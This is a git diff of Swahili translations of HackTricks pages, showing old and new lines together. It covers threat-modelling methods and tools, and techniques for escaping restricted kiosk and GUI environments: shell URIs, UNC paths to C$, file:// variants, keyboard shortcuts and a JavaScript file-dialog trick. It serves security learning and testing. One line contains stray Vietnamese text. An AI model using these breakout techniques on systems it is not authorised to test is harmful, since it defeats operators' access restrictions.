3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walio na idhini wanapohitajika. Mara nyingi inahusisha redundancy, uvumilivu wa hitilafu, na usanidi wa upatikanaji wa juu ili kuendelea kuendesha mifumo hata katika uso wa vikwazo.
1. **Usiri**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasio na idhini. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine kuzuia uvujaji wa data.
2. **Uadilifu**: Uwazi, uadilifu, na uaminifu wa data wakati wa mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyo na idhini. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data.
3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walio na idhini wanapohitajika. Mara nyingi inahusisha redundancy, uvumilivu wa makosa, na miundo ya upatikanaji wa juu ili kuhakikisha mifumo inaendelea hata katika kipindi cha vurugu.
### Njia za Uundaji wa Mfano wa Tishio
### Mbinu za Kufikiria Tishio
1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupisho cha **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, na Elevation of Privilege**. Kila jamii inawakilisha aina ya tishio, na njia hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo ili kutambua tishio la uwezekano.
2. **DREAD**: Hii ni njia nyingine kutoka Microsoft inayotumiwa kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Damage potential, Reproducibility, Exploitability, Affected users, na Discoverability**. Kila moja ya sababu hizi hupewa alama, na matokeo hutumiwa kuweka kipaumbele kwa tishio lililotambuliwa.
3. **PASTA** (Mchakato wa Uigaji wa Shambulio na Uchambuzi wa Tishio): Hii ni njia ya hatua saba, **yenye msingi wa hatari**. Inajumuisha ufafanuzi na utambuzi wa malengo ya usalama, kuunda wigo wa kiufundi, uchambuzi wa tishio, uchambuzi wa udhaifu, na tathmini ya hatari / triage.
4. **Trike**: Hii ni njia inayolenga hatari ambayo inazingatia ulinzi wa mali. Inaanza kutoka kwa mtazamo wa **usimamizi wa hatari** na inachunguza tishio na udhaifu katika muktadha huo.
5. **VAST** (Uundaji wa Mfano Rahisi, wa Haraka, na wa Kuona): Njia hii inalenga kuwa rahisi zaidi na inaunganisha katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka njia zingine na inazingatia **taswira za kuona za tishio**.
6. **OCTAVE** (Uchambuzi wa Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushirikiano cha CERT, mfumo huu unalenga **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**.
1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupi cha **Kujifanya, Kuharibu, Kukataa, Kufichua Habari, Kukataa Huduma, na Kuinua Uwezo wa Haki**. Kila jamii inawakilisha aina ya tishio, na mbinu hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo kutambua tishio la uwezekano.
2. **DREAD**: Hii ni mbinu nyingine kutoka Microsoft inayotumika kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Uharibifu wa Uwezo, Uwezekano wa Kurudia, Uwezekano wa Kutumia, Watumiaji Wanaoathiriwa, na Ugunduzi**. Kila moja ya sababu hizi hupewa alama, na matokeo hutumiwa kipaumbele tishio lililotambuliwa.
3. **PASTA** (Mchakato wa Ukweli wa Mashambulizi na Uchambuzi wa Tishio): Hii ni mbinu ya hatua saba, **yenye msingi wa hatari**. Inajumuisha kufafanua na kutambua malengo ya usalama, kuunda wigo wa kiufundi, uchambuzi wa tishio, uchambuzi wa udhaifu, na tathmini ya hatari/uchaguzi.
4. **Trike**: Hii ni mbinu inayolenga hatari ambayo inazingatia kulinda mali. Inaanza kutoka mtazamo wa **usimamizi wa hatari** na kutazama tishio na udhaifu katika muktadha huo.
5. **VAST** (Kufikiria Tishio kwa njia ya Visual, Agile, na Rahisi): Mbinu hii inalenga kuwa rahisi zaidi na inaingiliana katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka kwa mbinu zingine na inazingatia **uwakilishi wa visual wa tishio**.
6. **OCTAVE** (Tathmini ya Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushauri wa CERT, mfumo huu unalenga kwa **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**.
## Zana
@ -38,11 +52,11 @@ Kuna zana na suluhisho za programu kadhaa zinazopatikana ambazo zinaweza **kusai
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
Programu ya chui ya wavuti ya GUI ya msalaba ya juu na yenye vipengele vingi kwa wataalam wa usalama wa mtandao. Spider Suite inaweza kutumika kwa ajili ya kuchora na uchambuzi wa eneo la mashambulizi.
Kifaa cha msalaba cha juu cha jukwaa na GUI nyingi kwa wataalamu wa usalama wa mtandao. Spider Suite inaweza kutumika kwa ramani na uchambuzi wa eneo la shambulio.
**Matumizi**
1. Chagua URL na Fanya Uchunguzi
1. Chagua URL na Tafuta
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
@ -52,7 +66,7 @@ Programu ya chui ya wavuti ya GUI ya msalaba ya juu na yenye vipengele vingi kwa
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza mchoro wa mfumo pamoja na injini ya sheria ya kuzalisha tishio / kupunguza hatari.
Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza mifumo pamoja na injini ya sheria ya kuzalisha moja kwa moja tishio/mitigations.
**Matumizi**
@ -60,11 +74,11 @@ Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na deskto
<figure><img src="../.gitbook/assets/create_new_project_1.jpg" alt=""><figcaption></figcaption></figure>
Wakati mwingine inaweza kuonekana kama hii:
Wakati mwingine inaweza kuonekana kama hivi:
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
2. Zindua Mradi Mpya
2. Anzisha Mradi Mpya
<figure><img src="../.gitbook/assets/launch_new_project_2.jpg" alt=""><figcaption></figcaption></figure>
@ -74,18 +88,50 @@ Wakati mwingine inaweza kuonekana kama hii:
4. Unda mfano wako
Unaweza kutumia zana kama SpiderSuite Crawler kukupa msukumo, mfano wa msingi ungekuwa kama hii
Unaweza kutumia zana kama SpiderSuite Crawler kukupa msukumo, mfano wa msingi ungeonekana kama hivi
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
Kidogo tu ya maelezo kuhusu vitengo:
Kidogo kuhusu maelezo ya vitu:
* Mchakato (Kitengo yenyewe kama Seva ya Wavuti au utendaji wa wavuti)
* Mwigizaji (Mtu kama Mtembeleaji wa Tovuti, Mtumiaji, au Msimamizi)
* Mchakato (Entiti yenyewe kama Seva ya Wavuti au utendaji wa wavuti)
* Mwigizaji (Mtu kama Mtembeleaji wa Wavuti, Mtumiaji au Msimamizi)
* Mstari wa Mzunguko wa Data (Kiashiria cha Mwingiliano)
* Mipaka ya Uaminifu (Sehemu tofauti za mtandao au wigo.)
* Uhifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases)
* Mpaka wa Uaminifu (Maeneo tofauti ya mtandao au mazingira.)
* Hifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases)
5. Unda Tishio (Hatua ya 1)
5. Unda Tishio (Hatua 1)
Kwanza unapaswa kuchagua safu unayotaka kuong
Kwanza unapaswa kuchagua safu unayotaka kuongeza tishio
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
Sasa unaweza kuunda tishio
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
Kumbuka kuna tofauti kati ya Tishio la Mwigizaji na Tishio la Mchakato. Ikiwa ungeongeza tishio kwa Mwigizaji basi utaweza kuchagua "Kujifanya" na "Kukataa". Walakini katika mfano wetu tunaweka tishio kwa entiti ya Mchakato kwa hivyo tutapata hii katika sanduku la uundaji wa tishio:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. Maliza
Sasa mfano wako uliomalizika unapaswa kuonekana kama hivi. Na hivi ndivyo unavyounda mfano rahisi wa tishio na OWASP Threat Dragon.
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Chombo cha Microsoft Threat Modeling](https://aka.ms/threatmodelingtool)
Hii ni chombo cha bure kutoka Microsoft kinachosaidia katika kutambua vitisho katika hatua ya kubuni miradi ya programu. Hutumia mbinu ya STRIDE na ni hasa inafaa kwa wale wanaoendeleza kwenye mfumo wa Microsoft.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
---
# Angalia vitendo vinavyowezekana ndani ya programu ya GUI
**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kupata ufanisi wa Explorer ikiwa unaweza kupata chaguo hizi:
**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kufikia ufanisi wa Explorer ikiwa unaweza kufikia chaguo hizi:
* Funga/Funga kama
* Fungua/Fungua na
@ -33,7 +46,7 @@ Unapaswa kuangalia ikiwa unaweza:
## Utekelezaji wa Amri
Labda **kwa kutumia chaguo la `Fungua na`** unaweza kufungua/kutekeleza aina fulani ya shell.
Labda **ukitumia chaguo la `Fungua na`** unaweza kufungua/tekeleza aina fulani ya shell.
### Windows
@ -45,14 +58,14 @@ _bash, sh, zsh..._ Zaidi hapa: [https://gtfobins.github.io/](https://gtfobins.gi
# Windows
## Kupitisha vizuizi vya njia
## Kupitisha vikwazo vya njia
* **Mazingira ya mazingira**: Kuna mazingira mengi ya mazingira yanayoelekeza kwenye njia fulani
* **Itifaki zingine**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **Viungo vya ishara**
* **Vidirisha vya mkato**: CTRL+N (fungua kikao kipya), CTRL+R (Tekeleza Amri), CTRL+SHIFT+ESC (Meneja wa Kazi), Windows+E (fungua explorer), CTRL-B, CTRL-I (Vipendwa), CTRL-H (Historia), CTRL-L, CTRL-O (Faili/Dirisha la Kufungua), CTRL-P (Dirisha la Kuchapisha), CTRL-S (Hifadhi Kama)
* Menyu ya Utawala iliyofichwa: CTRL-ALT-F8, CTRL-ESC-F9
* **URI za Shell**: _shell:Vyombo vya Utawala, shell:Thibitisho za Nyaraka, shell:Vifaa vya Maktaba, shell:Profaili za Mtumiaji, shell:Binafsi, shell:Dirisha la Nyumbani la Utafutaji, shell:Mfumo wa Utafutaji, shell:Mahali pa Mtandao, shell:Tuma Kwa, shell:Profaili za Watumiaji, shell:Vyombo vya Utawala vya Kawaida, shell:Dirisha langu la Kompyuta, shell:Dirisha la Mtandao_
* **URIs za Shell**: _shell:Vyombo vya Utawala, shell:Thư viện tài liệu, shell:Thư việnshell:Profiles za Watumiaji, shell:Binafsi, shell:Dirisha la Nyumbani la Utafutaji, shell:Mfumo wa Utafutaji, shell:Watumiaji, shell:Vyombo vya Utawala vya Kawaida, shell:KompyutaYangu, shell:Folder la Mtandao_
* **Njia za UNC**: Njia za kuunganisha folda zilizoshirikiwa. Jaribu kuunganisha C$ ya mashine ya ndani ("\\\127.0.0.1\c$\Windows\System32")
* **Njia zaidi za UNC:**
@ -74,13 +87,13 @@ Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/pro
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
## Kupata mfumo wa faili kutoka kwenye kivinjari
## Kufikia mfumo wa faili kutoka kwenye kivinjari
| NJIA | NJIA | NJIA | NJIA |
| ------------------- | ----------------- | ------------------ | ------------------- |
| Faili:/C:/windows | Faili:/C:/windows/ | Faili:/C:/windows\\ | Faili:/C:\windows |
| Faili:/C:\windows\\ | Faili:/C:\windows/ | Faili://C:/windows | Faili://C:/windows/ |
| Faili://C:/windows\\ | Faili://C:\windows | Faili://C:\windows/ | Faili://C:\windows\\ |
| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows |
| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ |
| C:/windows | C:/windows/ | C:/windows\\ | C:\windows |
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
@ -88,20 +101,20 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour
## Vidirisha vya Mkato
* Viboreshaji vya Kitelezi Bonyeza SHIFT mara 5
* Viboreshaji vya Panya SHIFT+ALT+NUMLOCK
* Mfano wa Juu SHIFT+ALT+PRINTSCN
* Viboreshaji vya Toggle Shikilia NUMLOCK kwa sekunde 5
* Viboreshaji vya Kichujio Shikilia SHIFT ya kulia kwa sekunde 12
* Vitufe vya Sticky Bonyeza SHIFT mara 5
* Vitufe vya Panya SHIFT+ALT+NUMLOCK
* Mfumo wa Juu SHIFT+ALT+PRINTSCN
* Vitufe vya Toggle Shikilia NUMLOCK kwa sekunde 5
* Vitufe vya Kichujio Shikilia SHIFT ya kulia kwa sekunde 12
* WINDOWS+F1 Tafuta Windows
* WINDOWS+D Onyesha Dakiika
* WINDOWS+E Anzisha Windows Explorer
* WINDOWS+D Onyesha Daki
* WINDOWS+E Anzisha Explorer ya Windows
* WINDOWS+R Tekeleza
* WINDOWS+U Kituo cha Upatikanaji Rahisi
* WINDOWS+F Tafuta
* SHIFT+F10 Menyu ya Muktadha
* CTRL+SHIFT+ESC Meneja wa Kazi
* CTRL+ALT+DEL Skrini ya Kufurahisha kwenye toleo jipya la Windows
* CTRL+ALT+DEL Skrini ya kuingia kwenye toleo jipya la Windows
* F1 Msaada F3 Tafuta
* F6 Mstari wa Anwani
* F11 Badilisha skrini nzima ndani ya Internet Explorer
@ -121,7 +134,7 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour
### 'Mwambaa wa Picha'
Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma kwa Barua, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer.
Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma Baruapepe, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer.
### Itifaki ya Shell
@ -132,19 +145,19 @@ Andika URL hizi kupata mtazamo wa Explorer:
* `shell:Vifaa vya Maktaba`
* `shell:Profaili za Mtumiaji`
* `shell:Binafsi`
* `shell:Kutafuta Folda ya Nyumbani`
* `shell:Folda za Nafasi za Mtandao`
* `shell:Folderi ya Nyumbani ya Utafutaji`
* `shell:Folderi za Nafasi za Mtandao`
* `shell:Tuma Kwa`
* `shell:Profaili za Mtumiaji`
* `shell:Vifaa vya Utawala wa Kawaida`
* `shell:Funga Kompyuta Yangu`
* `shell:Funga Mtandao`
* `shell:Folderi ya Kompyuta Yangu`
* `shell:Folderi ya Mtandao`
* `Shell:Profaili`
* `Shell:Faili za Programu`
* `Shell:Mfumo`
* `Shell:Kisanduku cha Udhibiti`
* `Shell:Folderi ya Udhibiti wa Paneli`
* `Shell:Windows`
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Kisanduku cha Udhibiti
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Udhibiti wa Paneli
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Kompyuta Yangu
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> Nafasi za Mtandao Yangu
* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
@ -160,44 +173,44 @@ Backup toleo za iKat:
[http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
Unda dialog ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('<input/type=file>')`
Unda mazungumzo ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('<input/type=file>')`
Chanzo: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
# iPad
## Miguso na Vitufe
* Piga juu na vidole vinne (au vitano) / Bonyeza mara mbili kitufe cha Nyumbani: Kuona mtazamo wa kazi nyingi na kubadilisha Programu
* Piga juu na vidole vinne (au vitano) / Bonyeza mara mbili kitufe cha Nyumbani: Kuona muonekano wa kazi nyingi na kubadilisha Programu
* Piga upande mmoja au mwingine na vidole vinne au vitano: Ili kubadilisha kwa Programu inayofuata/ya mwisho
* Kanda skrini na vidole vitano / Gusa kitufe cha Nyumbani / Piga juu na kidole 1 kutoka chini ya skrini kwa mwendo wa haraka kwenda juu: Kufikia Nyumbani
* Piga kidole kimoja kutoka chini ya skrini kwa umbali wa 1-2 inchi (polepole): Doki itaonekana
* Piga kidole 1 kutoka chini ya skrini kwa umbali wa 1-2 inchi (pole): Doki itaonekana
* Piga chini kutoka juu ya skrini na kidole 1: Kuona arifa zako
* Piga chini na kidole 1 kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti cha iPad Pro
* Piga chini na kidole 1 kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti wa iPad Pro
* Piga kidole 1 kutoka kushoto mwa skrini 1-2 inchi: Kuona mtazamo wa Leo
* Piga kidole 1 kutoka kushoto mwa skrini 1-2 inchi: Kuona muonekano wa Leo
* Piga haraka kidole 1 kutoka katikati mwa skrini kwenda kulia au kushoto: Kubadilisha kwa Programu inayofuata/ya mwisho
* Bonyeza na shikilia kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad +** Slide kuelekea kulia kabisa: Kuzima
* Bonyeza na shikilia kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad +** Slide kuelekea kulia kabisa kwa kuzima: Kuzima
* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani kwa sekunde chache**: Kufanya kuzima ngumu
* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani haraka**: Kupiga picha skrini ambayo itaonekana chini kushoto ya skrini. Bonyeza vitufe vyote kwa wakati mmoja kwa muda mfupi kama vile unavyowashikilia kwa sekunde kadhaa kuzima ngumu itafanyika.
* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani haraka**: Kuchukua picha ya skrini itakayotokea chini kushoto ya skrini. Bonyeza vitufe vyote kwa wakati mmoja kwa muda mfupi kama vile unavyowashikilia kwa sekunde kadhaa kufanya kuzima ngumu.
## Vielekezi
Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee ambavyo vinaweza kusaidia kutoroka kutoka kwa programu vitafunuliwa hapa.
Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee vinavyoweza kusaidia kutoroka kutoka kwa programu vitaonyeshwa hapa.
| Kitufe | Jina |
| --- | ------------ |
| ⌘ | Amri |
| ⌥ | Chaguo (Alt) |
| ⇧ | Geuza |
| ⇧ | Badilisha |
| ↩ | Rudi |
| ⇥ | Tab |
| ^ | Udhibiti |
@ -215,7 +228,7 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
| F1 | Punguza Skrini |
| F2 | Ongeza mwangaza wa skrini |
| F7 | Rudi nyimbo moja |
| F8 | Cheza/Acha |
| F8 | Cheza/Acha |
| F9 | Ruka nyimbo |
| F10 | Kimya |
| F11 | Punguza sauti |
@ -227,27 +240,27 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
| Vielekezi | Hatua |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | Nenda kwa Nyumbani |
| ⌘⇧H (Amri-Geuza-H) | Nenda kwa Nyumbani |
| ⌘⇧H (Amri-Shift-H) | Nenda kwa Nyumbani |
| ⌘ (Space) | Fungua Spotlight |
| ⌘⇥ (Amri-Tab) | Orodhesha programu kumi zilizotumiwa mwisho |
| ⌘\~ | Nenda kwa Programu ya mwisho |
| ⌘⇧3 (Amri-Geuza-3) | Piga picha skrini (inahamia chini kushoto kuhifadhi au kuchukua hatua) |
| ⌘⇧4 | Piga picha skrini na ifungue kwenye mhariri |
| ⌘⇥ (Amri-Tab) | Onyesha programu kumi zilizotumiwa mwisho |
| ⌘\~ | Nenda kwa Programu iliyopita |
| ⌘⇧3 (Amri-Shift-3) | Piga picha ya skrini (itajitokeza chini kushoto kuhifadhi au kuchukua hatua) |
| ⌘⇧4 | Piga picha ya skrini na ifungue kwenye mhariri |
| Bonyeza na shikilia ⌘ | Orodha ya vielekezi inapatikana kwa Programu |
| ⌘⌥D (Amri-Chaguo/Alt-D) | Lete doki |
| ^⌥H (Udhibiti-Chaguo-H) | Kitufe cha Nyumbani |
| ^⌥H H (Udhibiti-Chaguo-H-H) | Onyesha upau wa kazi nyingi |
| ^⌥I (Udhibiti-Chaguo-i) | Chagua Kipengee |
| Kutoroka | Kitufe cha Nyuma |
| → (Mshale wa Kulia) | Kipengee kifuatacho |
| ^⌥I (Udhibiti-Chaguo-i) | Chagua kipengee |
| Kutoroka | Kitufe cha nyuma |
| → (Mshale wa Kulia) | Kipengee kijacho |
| ← (Mshale wa Kushoto) | Kipengee kilichopita |
| ↑↓ (Mshale wa Juu, Mshale wa Chini) | Bonyeza kwa wakati mmoja kipengee kilichochaguliwa |
| ⌥ ↓ (Chaguo-Mshale wa Chini) | Endesha chini |
| ⌥↑ (Chaguo-Mshale wa Juu) | Endesha juu |
| ⌥← or ⌥→ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia |
| ⌥← au ⌥→ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia |
| ^⌥S (Udhibiti-Chaguo-S) | Wezesha au Lemaza Sauti ya VoiceOver |
| ⌘⇧⇥ (Amri-Geuza-Tab) | Badilisha kwa programu iliyotangulia |
| ⌘⇥ (Amri-Tab) | Rudi kwa programu ya awali |
| ⌘⇧⇥ (Amri-Shift-Tab) | Badilisha kwa programu iliyopita |
| ⌘⇥ (Amri-Tab) | Badilisha kurudi kwa programu ya awali |
| ←+→, kisha Chaguo + ← au Chaguo+→ | Endesha kupitia Doki |
### Vielelezo vya Safari
@ -260,9 +273,9 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
| ⌘. | Acha kupakia kichupo cha sasa |
| ^⇥ | Badilisha kwenye kichupo kijacho |
| ^⇧⇥ (Kudhibiti-Shift-Tab) | Hamia kwenye kichupo kilichopita |
| ⌘L | Chagua kisanduku cha maandishi/eneo la URL ili ulibadilishe |
| ⌘L | Chagua kisanduku cha maandishi/URL kurekebisha |
| ⌘⇧T (Amri-Shift-T) | Fungua kichupo kilichofungwa mwisho (inaweza kutumika mara kadhaa) |
| ⌘\[ | Rudi nyuma ukurasa mmoja katika historia yako ya kutembelea |
| ⌘\[ | Nenda nyuma ukurasa mmoja katika historia yako ya kutembelea |
| ⌘] | Nenda mbele ukurasa mmoja katika historia yako ya kutembelea |
| ⌘⇧R | Wezesha Mode ya Msomaji |
@ -285,9 +298,21 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -295,6 +320,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,28 +1,41 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
